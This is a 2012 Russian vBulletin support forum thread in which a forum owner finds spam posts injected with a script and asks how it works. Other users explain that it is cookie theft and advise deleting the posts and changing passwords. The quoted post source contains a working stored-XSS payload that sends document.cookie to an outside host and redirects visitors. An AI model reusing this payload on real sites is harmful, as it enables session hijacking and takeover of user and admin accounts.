VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
почистить наверное можно. Вот только КАК это могло произойти?
На сервере нет чужих новых файлов за последний период и нет измененных (по дате).
Это называется MySQL-инъекция?
mmmalinkaaa добавил 22.04.2012 в 11:45
ой, кажется дело в этом:
HTML Code:
[CODE][quote=Опришок;10181]Как сделать лысого мужчину не подстригая его?[/quote]<br /><br />
Это же проще простого.... <br />
Шапочка и латекс все решают... <br /><script> img = new Image(); img.src = "http://sinamay.ru/s.gif?"+document.cookie; location.href ="http://daemzatakvk.in/ts.php?p_id=4916" </script>[/CODE]
это исходный код сообщения.
Видимо, в разделе разрешена обработка html
Last edited by mmmalinin : 04-22-2012 at 12:47 PM.
Reason: Добавлено сообщение
OlgaB
Специалист
Join Date: Jun 2009
Location: Russia
Награды в конкурсах:
Posts: 1,551
Версия vB: 3.8.4
Пол:
Reputation:
Мастер 3681
Репутация в разделе: 898
0
mmmalinkaaa, скорее всего добавили через [IМG]
Откройте профиль пользователя и поудаляйте все его сообщения.
@mmmalinin
Продвинутый
Join Date: Dec 2007
Posts: 94
Версия vB: 4.2.х
Пол:
Reputation:
Опытный 25
Репутация в разделе: 24
0
OlgaB, вполне похоже на то. В коде фигурирует картинка шлюхи. Правда, я не совсем представляю, как именно такое работает. Юзер зарегился совсем недавно и у него всего два сообщения, и в каждом такая вот закладка. Правда, неизвестно, сколько таких юзеров могло быть раньше...
В некоторых разделах действительно оказался включенным html.
mmmalinkaaa добавил 22.04.2012 в 13:10
а кто мне может объяснить смысл вот этого фрагмента?
HTML Code:
s.gif?"+document.cookie;
что это за кука приплюсована?
Last edited by mmmalinin : 04-22-2012 at 02:10 PM.
Reason: Добавлено сообщение
kerk
k0t
Join Date: May 2005
Location: localhost
Posts: 28,712
Версия vB: 3.8.x
Пол:
Reputation:
Гуру 20257
Репутация в разделе: 8432
0
прием стар как мир
воруют куки узеров с последующим взломом их аккаунтов
в числе жертв может оказаться и админ
прием стар как мир
воруют куки узеров с последующим взломом их аккаунтов
в числе жертв может оказаться и админ
Таким образом был взломан мой форум,когда я сидел на vbulletin 4.1.4
Это всё из - за включенного xtml на форуме?Сейчас стоит тройка,всё лишенее отключил,защитил движок как мог,но паранойя осталась
@mmmalinin
Продвинутый
Join Date: Dec 2007
Posts: 94
Версия vB: 4.2.х
Пол:
Reputation:
Опытный 25
Репутация в разделе: 24
0
Quote:
Originally Posted by kerk
воруют куки узеров с последующим взломом их аккаунтов
что сейчас следует сделать? почистить куки? сменить пароли?
kerk
k0t
Join Date: May 2005
Location: localhost
Posts: 28,712
Версия vB: 3.8.x
Пол:
Reputation:
Гуру 20257
Репутация в разделе: 8432
0
куки чистить не обязательно =)
а вот пароли сменить следует всем
ну по крайней мере тем, кто имеет доступ к админке/модерке
@prezer
Продвинутый
Join Date: Jan 2008
Posts: 24
Версия vB: 4.1.8
Reputation:
Опытный 14
Репутация в разделе: 13
0
Кто хочет поговорить с данным хакером, пожалуйста,
аську взял у саппорта партнерки по рефу, остальное показал гугл)